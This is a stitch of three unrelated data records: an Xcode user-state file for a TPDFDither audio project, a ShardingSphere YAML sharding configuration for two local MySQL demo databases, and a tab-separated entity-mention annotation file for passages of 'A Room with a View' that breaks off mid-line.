{\n\t\t\tPBXConfiguration.PBXFileTableDataSource3.PBXFileTableDataSource = {\n\t\t\t\tPBXFileTableDataSourceColumnSortingDirectionKey = \"-1\";\n\t\t\t\tPBXFileTableDataSourceColumnSortingKey = PBXFileDataSource_Filename_ColumnID;\n\t\t\t\tPBXFileTableDataSourceColumnWidthsKey = (\n\t\t\t\t\t20,\n\t\t\t\t\t649,\n\t\t\t\t\t20,\n\t\t\t\t\t48,\n\t\t\t\t\t43,\n\t\t\t\t\t43,\n\t\t\t\t\t20,\n\t\t\t\t);\n\t\t\t\tPBXFileTableDataSourceColumnsKey = (\n\t\t\t\t\tPBXFileDataSource_FiletypeID,\n\t\t\t\t\tPBXFileDataSource_Filename_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Built_ColumnID,\n\t\t\t\t\tPBXFileDataSource_ObjectSize_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Errors_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Warnings_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Target_ColumnID,\n\t\t\t\t);\n\t\t\t};\n\t\t\tPBXConfiguration.PBXTargetDataSource.PBXTargetDataSource = {\n\t\t\t\tPBXFileTableDataSourceColumnSortingDirectionKey = \"-1\";\n\t\t\t\tPBXFileTableDataSourceColumnSortingKey = PBXFileDataSource_Filename_ColumnID;\n\t\t\t\tPBXFileTableDataSourceColumnWidthsKey = (\n\t\t\t\t\t20,\n\t\t\t\t\t252,\n\t\t\t\t\t60,\n\t\t\t\t\t20,\n\t\t\t\t\t48,\n\t\t\t\t\t43,\n\t\t\t\t\t43,\n\t\t\t\t);\n\t\t\t\tPBXFileTableDataSourceColumnsKey = (\n\t\t\t\t\tPBXFileDataSource_FiletypeID,\n\t\t\t\t\tPBXFileDataSource_Filename_ColumnID,\n\t\t\t\t\tPBXTargetDataSource_PrimaryAttribute,\n\t\t\t\t\tPBXFileDataSource_Built_ColumnID,\n\t\t\t\t\tPBXFileDataSource_ObjectSize_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Errors_ColumnID,\n\t\t\t\t\tPBXFileDataSource_Warnings_ColumnID,\n\t\t\t\t);\n\t\t\t};\n\t\t\tPBXPerProjectTemplateStateSaveDate = 615684063;\n\t\t\tPBXWorkspaceStateSaveDate = 
615684063;\n\t\t};\n\t\tperUserProjectItems = {\n\t\t\t8BB06EF824A93B2D000F894A /* PlistBookmark */ = 8BB06EF824A93B2D000F894A /* PlistBookmark */;\n\t\t\t8BB070F624A947D8000F894A /* PBXTextBookmark */ = 8BB070F624A947D8000F894A /* PBXTextBookmark */;\n\t\t\t8BB9A49424B294CF00CD76A8 /* PBXTextBookmark */ = 8BB9A49424B294CF00CD76A8 /* PBXTextBookmark */;\n\t\t\t8BB9A58024B297F000CD76A8 /* PBXTextBookmark */ = 8BB9A58024B297F000CD76A8 /* PBXTextBookmark */;\n\t\t};\n\t\tsourceControlManager = 8BD3CCB8148830B20062E48C /* Source Control */;\n\t\tuserBuildSettings = {\n\t\t};\n\t};\n\t8BA05A660720730100365D66 /* TPDFDither.cpp */ = {\n\t\tuiCtxt = {\n\t\t\tsepNavIntBoundsRect = \"{{0, 0}, {839, 3198}}\";\n\t\t\tsepNavSelRange = \"{9650, 0}\";\n\t\t\tsepNavVisRange = \"{8782, 952}\";\n\t\t\tsepNavWindowFrame = \"{{525, 43}, {679, 835}}\";\n\t\t};\n\t};\n\t8BA05A690720730100365D66 /* TPDFDitherVersion.h */ = {\n\t\tuiCtxt = {\n\t\t\tsepNavIntBoundsRect = \"{{0, 0}, {824, 767}}\";\n\t\t\tsepNavSelRange = \"{2945, 0}\";\n\t\t\tsepNavVisRange = \"{32, 2933}\";\n\t\t\tsepNavWindowFrame = \"{{15, 38}, {679, 835}}\";\n\t\t};\n\t};\n\t8BB06EF824A93B2D000F894A /* PlistBookmark */ = {\n\t\tisa = PlistBookmark;\n\t\tfRef = 8D01CCD10486CAD60068D4B7 /* Info.plist */;\n\t\tfallbackIsa = PBXBookmark;\n\t\tisK = 0;\n\t\tkPath = (\n\t\t\tCFBundleName,\n\t\t);\n\t\tname = /Users/christopherjohnson/Desktop/TPDFDither/Info.plist;\n\t\trLen = 0;\n\t\trLoc = 9223372036854775808;\n\t};\n\t8BB070F624A947D8000F894A /* PBXTextBookmark */ = {\n\t\tisa = PBXTextBookmark;\n\t\tfRef = 8BC6025B073B072D006C4272 /* TPDFDither.h */;\n\t\tname = \"TPDFDither.h: 135\";\n\t\trLen = 0;\n\t\trLoc = 5317;\n\t\trType = 0;\n\t\tvrLen = 1095;\n\t\tvrLoc = 4325;\n\t};\n\t8BB9A49424B294CF00CD76A8 /* PBXTextBookmark */ = {\n\t\tisa = PBXTextBookmark;\n\t\tfRef = 8BA05A660720730100365D66 /* TPDFDither.cpp */;\n\t\tname = \"TPDFDither.cpp: 228\";\n\t\trLen = 0;\n\t\trLoc = 9650;\n\t\trType = 0;\n\t\tvrLen = 1490;\n\t\tvrLoc = 6952;\n\t};\n\t8BB9A58024B297F000CD76A8 /* PBXTextBookmark */ = {\n\t\tisa = PBXTextBookmark;\n\t\tfRef = 8BA05A660720730100365D66 /* TPDFDither.cpp */;\n\t\tname = \"TPDFDither.cpp: 228\";\n\t\trLen = 0;\n\t\trLoc = 9650;\n\t\trType = 0;\n\t\tvrLen = 952;\n\t\tvrLoc = 8782;\n\t};\n\t8BC6025B073B072D006C4272 /* TPDFDither.h */ = {\n\t\tuiCtxt = {\n\t\t\tsepNavIntBoundsRect = \"{{0, 0}, {894, 2067}}\";\n\t\t\tsepNavSelRange = \"{5317, 0}\";\n\t\t\tsepNavVisRange = \"{4325, 1095}\";\n\t\t\tsepNavWindowFrame = \"{{725, 43}, {679, 835}}\";\n\t\t};\n\t};\n\t8BD3CCB8148830B20062E48C /* Source Control */ = {\n\t\tisa = PBXSourceControlManager;\n\t\tfallbackIsa = XCSourceControlManager;\n\t\tisSCMEnabled = 0;\n\t\tscmConfiguration = {\n\t\t\trepositoryNamesForRoots = {\n\t\t\t\t\"\" = \"\";\n\t\t\t};\n\t\t};\n\t};\n\t8BD3CCB9148830B20062E48C /* Code sense */ = {\n\t\tisa = PBXCodeSenseManager;\n\t\tindexTemplatePath = \"\";\n\t};\n\t8D01CCC60486CAD60068D4B7 /* TPDFDither */ = {\n\t\tactiveExec = 0;\n\t};\n}\n"} {"text": "dataSources:\n ds_0: !!com.zaxxer.hikari.HikariDataSource\n driverClassName: com.mysql.jdbc.Driver\n jdbcUrl: jdbc:mysql://localhost:3306/demo_ds_0?serverTimezone=UTC&useSSL=false&useUnicode=true&characterEncoding=UTF-8\n username: root\n password:\n ds_1: !!com.zaxxer.hikari.HikariDataSource\n driverClassName: com.mysql.jdbc.Driver\n jdbcUrl: jdbc:mysql://localhost:3306/demo_ds_1?serverTimezone=UTC&useSSL=false&useUnicode=true&characterEncoding=UTF-8\n username: root\n password:\n\nshardingRule:\n tables:\n 
t_order: \n actualDataNodes: ds_${0..1}.t_order_${0..1}\n tableStrategy: \n standard:\n shardingColumn: order_id\n preciseAlgorithmClassName: org.apache.shardingsphere.example.algorithm.PreciseModuloShardingTableAlgorithm\n rangeAlgorithmClassName: org.apache.shardingsphere.example.algorithm.RangeModuloShardingTableAlgorithm\n keyGenerator:\n type: SNOWFLAKE\n column: order_id\n props:\n worker.id: 123 \n t_order_item:\n actualDataNodes: ds_${0..1}.t_order_item_${0..1}\n tableStrategy:\n standard:\n shardingColumn: order_id\n preciseAlgorithmClassName: org.apache.shardingsphere.example.algorithm.PreciseModuloShardingTableAlgorithm\n rangeAlgorithmClassName: org.apache.shardingsphere.example.algorithm.RangeModuloShardingTableAlgorithm\n keyGenerator:\n type: SNOWFLAKE\n column: order_item_id\n props:\n worker.id: 123 \n bindingTables:\n - t_order,t_order_item\n broadcastTables:\n - t_address\n defaultDatabaseStrategy:\n standard:\n shardingColumn: user_id\n preciseAlgorithmClassName: org.apache.shardingsphere.example.algorithm.PreciseModuloShardingDatabaseAlgorithm\n rangeAlgorithmClassName: org.apache.shardingsphere.example.algorithm.RangeModuloShardingDatabaseAlgorithm\n defaultTableStrategy:\n none:\n\nprops:\n sql.show: false\n"} {"text": "MENTION\tT0\t0\t8\t0\t9\tThe Signora\tPER\tNOM\nMENTION\tT2\t1\t21\t1\t22\ta courtyard\tFAC\tNOM\nMENTION\tT4\t3\t2\t3\t3\ta Cockney\tPER\tNOM\nMENTION\tT5\t4\t9\t4\t10\tthe Signora\tPER\tNOM\nMENTION\tT8\t6\t62\t6\t64\tthe English church\tORG\tNOM\nMENTION\tT11\t11\t12\t11\t13\tMiss Bartlett\tPER\tPROP\nMENTION\tT12\t13\t0\t13\t8\tThe rooms the Signora promised us in her letter\tFAC\tNOM\nMENTION\tT13\t13\t2\t13\t3\tthe Signora\tPER\tNOM\nMENTION\tT14\t14\t0\t14\t1\tThe Signora\tPER\tNOM\nMENTION\tT16\t16\t8\t16\t9\tMiss Bartlett\tPER\tPROP\nMENTION\tT17\t20\t5\t20\t6\tthe front\tFAC\tNOM\nMENTION\tT18\t20\t0\t20\t6\tThe first vacant room in the front\tFAC\tNOM\nMENTION\tT20\t20\t28\t20\t28\tLucy\tPER\tPROP\nMENTION\tT21\t24\t0\t24\t1\tYour mother\tPER\tNOM\nMENTION\tT22\t26\t0\t26\t1\tThe ladies\tPER\tNOM\nMENTION\tT23\t28\t2\t28\t3\ttheir neighbours\tPER\tNOM\nMENTION\tT25\t30\t0\t30\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT26\t32\t3\t32\t4\tthe intruder\tPER\tNOM\nMENTION\tT28\t41\t8\t41\t10\tthe old man\tPER\tNOM\nMENTION\tT31\t43\t5\t43\t6\tMiss Bartlett\tPER\tPROP\nMENTION\tT32\t44\t15\t44\t16\tour rooms\tFAC\tNOM\nMENTION\tT33\t46\t4\t46\t4\ttourist\tPER\tNOM\nMENTION\tT34\t47\t0\t47\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT36\t49\t1\t49\t3\tthe old man\tPER\tNOM\nMENTION\tT37\t52\t0\t52\t1\tHer cousin\tPER\tNOM\nMENTION\tT38\t55\t8\t55\t8\tmen\tPER\tNOM\nMENTION\tT39\t56\t14\t56\t15\this son\tPER\tNOM\nMENTION\tT40\t56\t7\t56\t9\ta naughty child\tPER\tNOM\nMENTION\tT41\t57\t8\t57\t9\tthe rooms\tFAC\tNOM\nMENTION\tT42\t57\t13\t57\t14\tthe son\tPER\tNOM\nMENTION\tT43\t59\t5\t59\t6\tthe ladies\tPER\tNOM\nMENTION\tT44\t60\t33\t60\t35\tthese ill-bred tourists\tPER\tNOM\nMENTION\tT46\t61\t5\t61\t6\tMiss Bartlett\tPER\tPROP\nMENTION\tT47\t61\t1\t61\t3\tthe old man\tPER\tNOM\nMENTION\tT48\t64\t0\t64\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT52\t75\t6\t75\t7\tthe room\tFAC\tNOM\nMENTION\tT55\t79\t11\t79\t12\tthe rooms\tFAC\tNOM\nMENTION\tT56\t81\t0\t81\t1\tMiss Bartlett\tPER\tPROP\nMENTION\tT57\t81\t14\t81\t15\tMr. 
Beebe\tPER\tPROP\nMENTION\tT59\t83\t16\t83\t17\tthe ladies\tPER\tNOM\nMENTION\tT61\t85\t33\t85\t34\ther cousin\tPER\tNOM\nMENTION\tT62\t85\t30\t85\t31\tthe waiter\tPER\tNOM\nMENTION\tT63\t88\t1\t88\t2\tMiss Honeychurch\tPER\tPROP\nMENTION\tT64\t88\t48\t88\t48\tmother\tPER\tNOM\nMENTION\tT66\t88\t13\t88\t14\tMiss Bartlett\tPER\tPROP\nMENTION\tT67\t88\t8\t88\t9\tSummer Street\tFAC\tPROP\nMENTION\tT68\t89\t9\t89\t10\tTunbridge Wells\tGPE\tPROP\nMENTION\tT69\t89\t24\t89\t25\tMr. Beebe\tPER\tPROP\nMENTION\tT70\t89\t35\t89\t36\tthe clergyman\tPER\tNOM\nMENTION\tT71\t90\t4\t90\t5\tthe Rectory\tFAC\tNOM\nMENTION\tT72\t90\t7\t90\t8\tSummer Street\tFAC\tPROP\nMENTION\tT73\t91\t7\t91\t10\tsuch a charming neighbourhood\tFAC\tNOM\nMENTION\tT74\t93\t3\t93\t4\tour house\tFAC\tNOM\nMENTION\tT76\t94\t0\t94\t1\tMr. Beebe\tPER\tPROP\nMENTION\tT77\t95\t23\t95\t24\tThe church\tFAC\tNOM\nMENTION\tT79\t96\t6\t96\t7\tMr. Beebe\tPER\tPROP\nMENTION\tT81\t99\t2\t99\t3\tthe girl\tPER\tNOM\nMENTION\tT82\t99\t7\t99\t7\tFlorence\tGPE\tPROP\nMENTION\tT83\t100\t5\t100\t6\ta newcomer\tPER\tNOM\nMENTION\tT87\t106\t4\t106\t5\tyour ladies\tPER\tNOM\nMENTION\tT88\t107\t1\t107\t2\tThat lady\tPER\tNOM\nMENTION\tT89\t107\t9\t107\t10\tMiss Bartlett\tPER\tPROP\nMENTION\tT90\t107\t12\t107\t13\ther cousin\tPER\tNOM\nMENTION\tT91\t110\t24\t110\t25\tthe beggars\tPER\tNOM\nMENTION\tT92\t110\t38\t110\t39\tthe place\tGPE\tNOM\nMENTION\tT93\t111\t0\t111\t2\tThe Pension Bertolini\tFAC\tPROP\nMENTION\tT94\t112\t5\t112\t6\tkind ladies\tPER\tNOM\nMENTION\tT95\t113\t7\t113\t9\tthe clever lady\tPER\tNOM\nMENTION\tT96\t115\t0\t115\t1\tThat place\tGPE\tNOM\nMENTION\tT97\t117\t0\t117\t4\tThe young man named George\tPER\tNOM\nMENTION\tT98\t117\t4\t117\t4\tGeorge\tPER\tPROP\nMENTION\tT99\t117\t7\t117\t9\tthe clever lady\tPER\tNOM\nMENTION\tT102\t120\t28\t120\t30\tthe two outsiders\tPER\tNOM\nMENTION\tT1\t0\t19\t0\t20\tMiss Bartlett\tPER\tPROP\nMENTION\tT103\t1\t3\t1\t9\tsouth rooms with a view close together\tFAC\tNOM\nMENTION\tT3\t1\t16\t1\t28\tnorth rooms , looking into a courtyard , and a long way apart\tFAC\tNOM\nMENTION\tT104\t4\t1\t4\t1\tLucy\tPER\tPROP\nMENTION\tT6\t5\t4\t5\t4\tLondon\tGPE\tPROP\nMENTION\tT105\t6\t7\t6\t8\tEnglish people\tPER\tNOM\nMENTION\tT7\t6\t32\t6\t34\tthe English people\tPER\tNOM\nMENTION\tT106\t6\t40\t6\t42\tthe late Queen\tPER\tNOM\nMENTION\tT9\t6\t44\t6\t47\tthe late Poet Laureate\tPER\tNOM\nMENTION\tT107\t6\t51\t6\t53\tthe English people\tPER\tNOM\nMENTION\tT108\t6\t66\t6\t68\tRev. 
Cuthbert Eager\tPER\tPROP\nMENTION\tT109\t8\t1\t8\t1\tCharlotte\tPER\tPROP\nMENTION\tT10\t8\t15\t8\t15\tLondon\tGPE\tPROP\nMENTION\tT110\t12\t6\t12\t7\tthe Arno\tLOC\tPROP\nMENTION\tT111\t13\t13\t13\t14\tthe Arno\tLOC\tPROP\nMENTION\tT15\t17\t0\t17\t0\tLucy\tPER\tPROP\nMENTION\tT112\t18\t1\t18\t1\tCharlotte\tPER\tPROP\nMENTION\tT113\t18\t16\t18\t17\tthe Arno\tLOC\tPROP\nMENTION\tT19\t20\t17\t20\t18\tMiss Bartlett\tPER\tPROP\nMENTION\tT114\t20\t28\t20\t30\tLucy ’s mother\tPER\tNOM\nMENTION\tT115\t24\t7\t24\t7\tLucy\tPER\tPROP\nMENTION\tT116\t28\t0\t28\t3\tSome of their neighbours\tPER\tNOM\nMENTION\tT117\t28\t12\t28\t21\tone of the ill-bred people whom one does meet abroad\tPER\tNOM\nMENTION\tT118\t28\t8\t28\t10\tone of them\tPER\tNOM\nMENTION\tT24\t33\t2\t33\t18\tan old man , of heavy build , with a fair , shaven face and large eyes\tPER\tNOM\nMENTION\tT27\t35\t4\t35\t5\tMiss Bartlett\tPER\tPROP\nMENTION\tT29\t41\t3\t41\t4\tmy son\tPER\tNOM\nMENTION\tT30\t41\t16\t41\t16\tGeorge\tPER\tPROP\nMENTION\tT120\t43\t9\t43\t9\tLucy\tPER\tPROP\nMENTION\tT121\t46\t13\t46\t14\tthe new-comers\tPER\tNOM\nMENTION\tT122\t46\t0\t46\t4\tThe better class of tourist\tPER\tNOM\nMENTION\tT35\t51\t13\t51\t13\tLucy\tPER\tPROP\nMENTION\tT123\t55\t1\t55\t1\tWomen\tPER\tNOM\nMENTION\tT124\t56\t20\t56\t20\tGeorge\tPER\tPROP\nMENTION\tT125\t60\t0\t60\t0\tLucy\tPER\tPROP\nMENTION\tT45\t60\t48\t60\t48\trooms\tFAC\tNOM\nMENTION\tT126\t65\t5\t65\t8\tany one so gross\tPER\tNOM\nMENTION\tT49\t68\t1\t68\t12\ttwo little old ladies , who were sitting further up the table\tPER\tNOM\nMENTION\tT127\t69\t11\t69\t11\tLucy\tPER\tPROP\nMENTION\tT128\t70\t0\t70\t0\tLucy\tPER\tPROP\nMENTION\tT129\t70\t5\t70\t8\tvery odd people opposite\tPER\tNOM\nMENTION\tT130\t71\t5\t71\t5\tdear\tPER\tNOM\nMENTION\tT131\t72\t0\t72\t1\tThis pension\tFAC\tNOM\nMENTION\tT132\t31\t2\t31\t3\ta pension\tFAC\tNOM\nMENTION\tT50\t75\t12\t75\t34\ta clergyman , stout but attractive , who hurried forward to take his place at the table , cheerfully apologizing for his lateness\tPER\tNOM\nMENTION\tT51\t76\t0\t76\t0\tLucy\tPER\tPROP\nMENTION\tT53\t77\t4\t77\t5\tMr. Beebe\tPER\tPROP\nMENTION\tT54\t79\t2\t79\t2\tCharlotte\tPER\tPROP\nMENTION\tT133\t82\t8\t82\t9\tMiss Bartlett\tPER\tPROP\nMENTION\tT58\t82\t11\t82\t12\tMiss Honeychurch\tPER\tPROP\nMENTION\tT134\t82\t17\t82\t18\tTunbridge Wells\tGPE\tPROP\nMENTION\tT135\t82\t25\t82\t27\tSt. Peter ’s\tORG\tNOM\nMENTION\tT136\t82\t22\t82\t27\tthe Vicar of St. Peter ’s\tPER\tNOM\nMENTION\tT60\t83\t0\t83\t11\tThe clergyman , who had the air of one on a holiday\tPER\tNOM\nMENTION\tT137\t84\t16\t84\t16\tLucy\tPER\tPROP\nMENTION\tT138\t85\t11\t85\t21\tthe girl , who was in a state of spiritual starvation\tPER\tNOM\nMENTION\tT139\t87\t0\t87\t1\tSummer Street\tFAC\tPROP\nMENTION\tT140\t88\t5\t88\t9\tthe parish of Summer Street\tFAC\tNOM\nMENTION\tT65\t93\t6\t93\t7\tWindy Corner\tFAC\tPROP\nMENTION\tT75\t95\t3\t95\t3\tmother\tPER\tNOM\nMENTION\tT78\t95\t9\t95\t10\tmy brother\tPER\tNOM\nMENTION\tT141\t96\t1\t96\t1\tLucy\tPER\tPROP\nMENTION\tT142\t98\t5\t98\t5\tLucy\tPER\tPROP\nMENTION\tT80\t98\t15\t98\t16\tMiss Bartlett\tPER\tPROP\nMENTION\tT143\t99\t21\t99\t21\tthere\tGPE\tNOM\nMENTION\tT144\t102\t8\t102\t8\tFiesole\tGPE\tPROP\nMENTION\tT145\t102\t13\t102\t13\tSettignano\tGPE\tPROP\nMENTION\tT85\t105\t1\t105\t2\tMr. 
Beebe\tPER\tPROP\nMENTION\tT86\t106\t9\t106\t9\tPrato\tGPE\tPROP\nMENTION\tT146\t110\t0\t110\t0\tPeople\tPER\tNOM\nMENTION\tT147\t110\t15\t110\t17\tthe electric trams\tVEH\tNOM\nMENTION\tT148\t113\t14\t113\t14\tPrato\tGPE\tPROP\nMENTION\tT149\t114\t4\t114\t4\tPrato\tGPE\tPROP\nMENTION\tT100\t118\t3\t118\t4\this father\tPER\tNOM\nMENTION\tT101\t119\t0\t119\t0\tLucy\tPER\tPROP\nMENTION\tT150\t0\t5\t0\t6\tThe Bertolini\tFAC\tNOM\nMENTION\tT151\t6\t72\t6\t72\tOxon\tORG\tPROP\nMENTION\tT119\t31\t4\t31\t4\tpeople\tPER\tNOM\nMENTION\tT175\t86\t5\t86\t6\tthe world\tLOC\tNOM\nMENTION\tT176\t120\t7\t120\t8\tany one\tPER\tNOM\nMENTION\tT177\t1\t14\t1\t14\there\tFAC\tNOM\nMENTION\tT179\t1\t0\t1\t0\tShe\tPER\tPRON\nMENTION\tT180\t1\t2\t1\t2\tus\tPER\tPRON\nMENTION\tT181\t6\t0\t6\t0\tShe\tPER\tPRON\nMENTION\tT182\t8\t5\t8\t5\tyou\tPER\tPRON\nMENTION\tT183\t8\t11\t8\t11\twe\tPER\tPRON\nMENTION\tT184\t9\t0\t9\t0\tI\tPER\tPRON\nMENTION\tT185\t10\t0\t10\t0\tI\tPER\tPRON\nMENTION\tT186\t11\t17\t11\t17\ther\tPER\tPRON\nMENTION\tT187\t12\t1\t12\t1\tI\tPER\tPRON\nMENTION\tT188\t13\t5\t13\t5\tus\tPER\tPRON\nMENTION\tT189\t13\t7\t13\t7\ther\tPER\tPRON\nMENTION\tT190\t16\t5\t16\t5\tme\tPER\tPRON\nMENTION\tT191\t16\t19\t16\t19\tyou\tPER\tPRON\nMENTION\tT192\t17\t3\t17\t3\tshe\tPER\tPRON\nMENTION\tT193\t18\t3\t18\t3\tyou\tPER\tPRON\nMENTION\tT194\t18\t7\t18\t7\tme\tPER\tPRON\nMENTION\tT195\t18\t12\t18\t12\tyou\tPER\tPRON\nMENTION\tT196\t19\t0\t19\t0\tI\tPER\tPRON\nMENTION\tT197\t20\t10\t20\t10\tYou\tPER\tPRON\nMENTION\tT198\t20\t38\t20\t38\tshe\tPER\tPRON\nMENTION\tT199\t22\t0\t22\t0\tYou\tPER\tPRON\nMENTION\tT200\t23\t1\t23\t1\tI\tPER\tPRON\nMENTION\tT201\t24\t0\t24\t0\tYour\tPER\tPRON\nMENTION\tT202\t24\t5\t24\t5\tme\tPER\tPRON\nMENTION\tT203\t25\t1\t25\t1\tShe\tPER\tPRON\nMENTION\tT204\t25\t5\t25\t5\tme\tPER\tPRON\nMENTION\tT205\t27\t0\t27\t0\tThey\tPER\tPRON\nMENTION\tT206\t27\t10\t27\t10\tthey\tPER\tPRON\nMENTION\tT207\t28\t2\t28\t2\ttheir\tPER\tPRON\nMENTION\tT208\t28\t10\t28\t10\tthem\tPER\tPRON\nMENTION\tT209\t28\t32\t28\t32\ttheir\tPER\tPRON\nMENTION\tT210\t29\t0\t29\t0\tHe\tPER\tPRON\nMENTION\tT211\t29\t4\t29\t4\tI\tPER\tPRON\nMENTION\tT212\t29\t9\t29\t9\tI\tPER\tPRON\nMENTION\tT213\t31\t6\t31\t6\tthem\tPER\tPRON\nMENTION\tT214\t31\t23\t31\t23\tthey\tPER\tPRON\nMENTION\tT215\t31\t29\t31\t29\tthey\tPER\tPRON\nMENTION\tT216\t32\t0\t32\t0\tShe\tPER\tPRON\nMENTION\tT217\t32\t10\t32\t10\tshe\tPER\tPRON\nMENTION\tT218\t32\t13\t32\t13\thim\tPER\tPRON\nMENTION\tT219\t33\t0\t33\t0\tHe\tPER\tPRON\nMENTION\tT220\t35\t13\t35\t13\ther\tPER\tPRON\nMENTION\tT221\t35\t18\t35\t18\this\tPER\tPRON\nMENTION\tT222\t36\t4\t36\t4\ther\tPER\tPRON\nMENTION\tT223\t37\t0\t37\t0\tHe\tPER\tPRON\nMENTION\tT224\t37\t8\t37\t8\tthem\tPER\tPRON\nMENTION\tT225\t37\t10\t37\t10\tthey\tPER\tPRON\nMENTION\tT226\t38\t1\t38\t1\tshe\tPER\tPRON\nMENTION\tT227\t38\t7\t38\t7\the\tPER\tPRON\nMENTION\tT228\t38\t10\t38\t10\ther\tPER\tPRON\nMENTION\tT229\t41\t3\t41\t3\tmy\tPER\tPRON\nMENTION\tT230\t41\t13\t41\t13\this\tPER\tPRON\nMENTION\tT231\t42\t0\t42\t0\tHe\tPER\tPRON\nMENTION\tT232\t44\t2\t44\t2\tI\tPER\tPRON\nMENTION\tT233\t44\t6\t44\t6\the\tPER\tPRON\nMENTION\tT234\t44\t12\t44\t12\tyou\tPER\tPRON\nMENTION\tT235\t44\t15\t44\t15\tour\tPER\tPRON\nMENTION\tT236\t44\t19\t44\t19\twe\tPER\tPRON\nMENTION\tT237\t45\t0\t45\t0\tWe\tPER\tPRON\nMENTION\tT238\t47\t7\t47\t7\ther\tPER\tPRON\nMENTION\tT239\t47\t18\t47\t18\tyou\tPER\tPRON\nMENTION\tT240\t50\t11\t50\t11\tyou\tPER\tPRON\nMENTION\tT241\t51\t1\t51\t1\tYou\tPER\tPRON\nMENTION\tT242\t51\t4\t51\t4\twe\tPER
\tPRON\nMENTION\tT243\t52\t0\t52\t0\tHer\tPER\tPRON\nMENTION\tT244\t52\t4\t52\t4\ther\tPER\tPRON\nMENTION\tT245\t54\t0\t54\t0\the\tPER\tPRON\nMENTION\tT246\t56\t1\t56\t1\the\tPER\tPRON\nMENTION\tT247\t56\t4\t56\t4\this\tPER\tPRON\nMENTION\tT248\t56\t14\t56\t14\this\tPER\tPRON\nMENTION\tT249\t56\t23\t56\t23\tthem\tPER\tPRON\nMENTION\tT250\t57\t5\t57\t5\tthey\tPER\tPRON\nMENTION\tT251\t59\t0\t59\t0\tHe\tPER\tPRON\nMENTION\tT252\t59\t8\t59\t8\the\tPER\tPRON\nMENTION\tT253\t59\t12\t59\t12\this\tPER\tPRON\nMENTION\tT254\t60\t8\t60\t8\tshe\tPER\tPRON\nMENTION\tT255\t60\t11\t60\t11\tthey\tPER\tPRON\nMENTION\tT256\t60\t26\t60\t26\tshe\tPER\tPRON\nMENTION\tT257\t60\t64\t60\t64\tshe\tPER\tPRON\nMENTION\tT258\t61\t12\t61\t12\tshe\tPER\tPRON\nMENTION\tT259\t62\t4\t62\t4\tshe\tPER\tPRON\nMENTION\tT260\t63\t0\t63\t0\tThey\tPER\tPRON\nMENTION\tT261\t66\t0\t66\t0\tHer\tPER\tPRON\nMENTION\tT262\t67\t0\t67\t0\tShe\tPER\tPRON\nMENTION\tT263\t67\t11\t67\t11\tyou\tPER\tPRON\nMENTION\tT264\t68\t30\t68\t30\tWe\tPER\tPRON\nMENTION\tT265\t68\t34\t68\t34\twe\tPER\tPRON\nMENTION\tT266\t69\t2\t69\t2\tyour\tPER\tPRON\nMENTION\tT267\t69\t8\t69\t8\tshe\tPER\tPRON\nMENTION\tT268\t69\t22\t69\t22\tshe\tPER\tPRON\nMENTION\tT269\t71\t2\t71\t2\tyour\tPER\tPRON\nMENTION\tT270\t73\t1\t73\t1\twe\tPER\tPRON\nMENTION\tT271\t74\t2\t74\t2\tshe\tPER\tPRON\nMENTION\tT272\t74\t8\t74\t8\tshe\tPER\tPRON\nMENTION\tT273\t75\t24\t75\t24\this\tPER\tPRON\nMENTION\tT274\t75\t33\t75\t33\this\tPER\tPRON\nMENTION\tT275\t76\t13\t76\t13\ther\tPER\tPRON\nMENTION\tT276\t79\t4\t79\t4\twe\tPER\tPRON\nMENTION\tT277\t81\t11\t81\t11\tyou\tPER\tPRON\nMENTION\tT278\t82\t0\t82\t0\tI\tPER\tPRON\nMENTION\tT279\t82\t3\t82\t3\tyou\tPER\tPRON\nMENTION\tT280\t82\t6\t82\t6\tus\tPER\tPRON\nMENTION\tT281\t82\t20\t82\t20\tyou\tPER\tPRON\nMENTION\tT282\t83\t22\t83\t22\tthey\tPER\tPRON\nMENTION\tT283\t83\t24\t83\t24\thim\tPER\tPRON\nMENTION\tT284\t84\t1\t84\t1\the\tPER\tPRON\nMENTION\tT285\t84\t12\t84\t12\the\tPER\tPRON\nMENTION\tT286\t85\t1\t85\t1\tI\tPER\tPRON\nMENTION\tT287\t85\t7\t85\t7\tyou\tPER\tPRON\nMENTION\tT288\t85\t33\t85\t33\ther\tPER\tPRON\nMENTION\tT289\t88\t23\t88\t23\tshe\tPER\tPRON\nMENTION\tT290\t88\t27\t88\t27\tme\tPER\tPRON\nMENTION\tT291\t88\t34\t88\t34\tyou\tPER\tPRON\nMENTION\tT292\t88\t45\t88\t45\tI\tPER\tPRON\nMENTION\tT293\t89\t0\t89\t0\tShe\tPER\tPRON\nMENTION\tT294\t89\t5\t89\t5\tI\tPER\tPRON\nMENTION\tT295\t89\t7\t89\t7\tyou\tPER\tPRON\nMENTION\tT296\t89\t13\t89\t13\tI\tPER\tPRON\nMENTION\tT297\t89\t20\t89\t20\tI\tPER\tPRON\nMENTION\tT298\t90\t1\t90\t1\tI\tPER\tPRON\nMENTION\tT299\t91\t0\t91\t0\tI\tPER\tPRON\nMENTION\tT300\t92\t5\t92\t5\tI\tPER\tPRON\nMENTION\tT301\t93\t3\t93\t3\tour\tPER\tPRON\nMENTION\tT302\t95\t5\t95\t5\tme\tPER\tPRON\nMENTION\tT303\t95\t9\t95\t9\tmy\tPER\tPRON\nMENTION\tT304\t95\t17\t95\t17\twe\tPER\tPRON\nMENTION\tT305\t95\t19\t95\t19\thim\tPER\tPRON\nMENTION\tT306\t95\t30\t95\t30\tI\tPER\tPRON\nMENTION\tT307\t96\t9\t96\t9\this\tPER\tPRON\nMENTION\tT308\t97\t1\t97\t1\tI\tPER\tPRON\nMENTION\tT309\t97\t7\t97\t7\tyou\tPER\tPRON\nMENTION\tT310\t98\t0\t98\t0\tHe\tPER\tPRON\nMENTION\tT311\t98\t9\t98\t9\the\tPER\tPRON\nMENTION\tT312\t98\t21\t98\t21\this\tPER\tPRON\nMENTION\tT313\t99\t0\t99\t0\tHe\tPER\tPRON\nMENTION\tT314\t99\t5\t99\t5\tshe\tPER\tPRON\nMENTION\tT315\t99\t17\t99\t17\tshe\tPER\tPRON\nMENTION\tT316\t100\t9\t100\t9\the\tPER\tPRON\nMENTION\tT317\t101\t9\t101\t9\this\tPER\tPRON\nMENTION\tT318\t105\